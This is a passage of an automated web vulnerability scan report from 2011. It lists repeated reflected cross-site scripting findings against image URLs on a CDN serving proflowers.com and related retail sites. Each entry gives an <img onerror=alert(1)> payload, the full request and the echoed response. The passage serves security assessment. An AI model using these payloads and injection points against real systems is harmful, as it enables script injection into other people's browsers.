Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 443e5<img%20src%3da%20onerror%3dalert(1)>94aad6f4a68 was submitted in the REST URL parameter 9. This input was echoed as 443e5<img src=a onerror=alert(1)>94aad6f4a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ443e5<img%20src%3da%20onerror%3dalert(1)>94aad6f4a68?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:07 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ443e5<img src=a onerror=alert(1)>94aad6f4a68

4.150. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341 was submitted in the REST URL parameter 9. This input was echoed as d1ba3<img src=a onerror=alert(1)>a60921a1341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQd1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:11 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQd1ba3<img src=a onerror=alert(1)>a60921a1341

4.151. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload adbc9<img%20src%3da%20onerror%3dalert(1)>5310c9a9fa6 was submitted in the REST URL parameter 9. This input was echoed as adbc9<img src=a onerror=alert(1)>5310c9a9fa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQadbc9<img%20src%3da%20onerror%3dalert(1)>5310c9a9fa6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:48 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQadbc9<img src=a onerror=alert(1)>5310c9a9fa6

4.152. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4d8aa<img%20src%3da%20onerror%3dalert(1)>3b6dc5e579c was submitted in the REST URL parameter 9. This input was echoed as 4d8aa<img src=a onerror=alert(1)>3b6dc5e579c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ4d8aa<img%20src%3da%20onerror%3dalert(1)>3b6dc5e579c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:16 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ4d8aa<img src=a onerror=alert(1)>3b6dc5e579c

4.153. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f6cb8<img%20src%3da%20onerror%3dalert(1)>ebea8158570 was submitted in the REST URL parameter 9. This input was echoed as f6cb8<img src=a onerror=alert(1)>ebea8158570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PFf6cb8<img%20src%3da%20onerror%3dalert(1)>ebea8158570?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/SUN10yellowfill_pnk11_PFf6cb8<img src=a onerror=alert(1)>ebea8158570

4.154. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e6bab<img%20src%3da%20onerror%3dalert(1)>4ea615db158 was submitted in the REST URL parameter 9. This input was echoed as e6bab<img src=a onerror=alert(1)>4ea615db158 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PFe6bab<img%20src%3da%20onerror%3dalert(1)>4ea615db158?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:50 GMT
Connection: close

Unable to find /ProvideCommerce/TUL15assrt_sgv09_PFe6bab<img src=a onerror=alert(1)>4ea615db158

4.155. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1c0f1<img%20src%3da%20onerror%3dalert(1)>785ef5a0184 was submitted in the REST URL parameter 9. This input was echoed as 1c0f1<img src=a onerror=alert(1)>785ef5a0184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF1c0f1<img%20src%3da%20onerror%3dalert(1)>785ef5a0184?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20assrt_grn10_test_PF1c0f1<img src=a onerror=alert(1)>785ef5a0184

4.156. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5317<img%20src%3da%20onerror%3dalert(1)>da90941c6d7 was submitted in the REST URL parameter 9. This input was echoed as b5317<img src=a onerror=alert(1)>da90941c6d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PFb5317<img%20src%3da%20onerror%3dalert(1)>da90941c6d7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:08 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30assrt_tv11_catalog_PFb5317<img src=a onerror=alert(1)>da90941c6d7

4.157. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2eb13<img%20src%3da%20onerror%3dalert(1)>daf816ec27c was submitted in the REST URL parameter 9. This input was echoed as 2eb13<img src=a onerror=alert(1)>daf816ec27c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF2eb13<img%20src%3da%20onerror%3dalert(1)>daf816ec27c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:54 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30purple_purpletrmp11_PF2eb13<img src=a onerror=alert(1)>daf816ec27c

4.158. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bf2d8<img%20src%3da%20onerror%3dalert(1)>e597a089cde was submitted in the REST URL parameter 9. This input was echoed as bf2d8<img src=a onerror=alert(1)>e597a089cde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_lbf2d8<img%20src%3da%20onerror%3dalert(1)>e597a089cde?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:25 GMT
Connection: close

Unable to find /ProvideCommerce/TropOrgSmplrPF_lbf2d8<img src=a onerror=alert(1)>e597a089cde

4.159. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9159b<img%20src%3da%20onerror%3dalert(1)>e6aa7594d00 was submitted in the REST URL parameter 9. This input was echoed as 9159b<img src=a onerror=alert(1)>e6aa7594d00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m9159b<img%20src%3da%20onerror%3dalert(1)>e6aa7594d00?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTherbal09book_m9159b<img src=a onerror=alert(1)>e6aa7594d00

4.160. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e41e<img%20src%3da%20onerror%3dalert(1)>33229c41e77 was submitted in the REST URL parameter 9. This input was echoed as 4e41e<img src=a onerror=alert(1)>33229c41e77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF4e41e<img%20src%3da%20onerror%3dalert(1)>33229c41e77?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTlavendarluxe_PF4e41e<img src=a onerror=alert(1)>33229c41e77

4.161. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e84a1<img%20src%3da%20onerror%3dalert(1)>2db1c5fbe55 was submitted in the REST URL parameter 9. This input was echoed as e84a1<img src=a onerror=alert(1)>2db1c5fbe55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_le84a1<img%20src%3da%20onerror%3dalert(1)>2db1c5fbe55?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/WRTremembrance09_le84a1<img src=a onerror=alert(1)>2db1c5fbe55

4.162. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a0a24<img%20src%3da%20onerror%3dalert(1)>c317587d015 was submitted in the REST URL parameter 9. This input was echoed as a0a24<img src=a onerror=alert(1)>c317587d015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_la0a24<img%20src%3da%20onerror%3dalert(1)>c317587d015?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTsympathy_la0a24<img src=a onerror=alert(1)>c317587d015

4.163. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 57238<img%20src%3da%20onerror%3dalert(1)>343bdc9b250 was submitted in the REST URL parameter 9. This input was echoed as 57238<img src=a onerror=alert(1)>343bdc9b250 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn57238<img%20src%3da%20onerror%3dalert(1)>343bdc9b250?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/accgenblue09_tn57238<img src=a onerror=alert(1)>343bdc9b250

4.164. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7cd4b<img%20src%3da%20onerror%3dalert(1)>1abce527698 was submitted in the REST URL parameter 9. This input was echoed as 7cd4b<img src=a onerror=alert(1)>1abce527698 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b7cd4b<img%20src%3da%20onerror%3dalert(1)>1abce527698?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

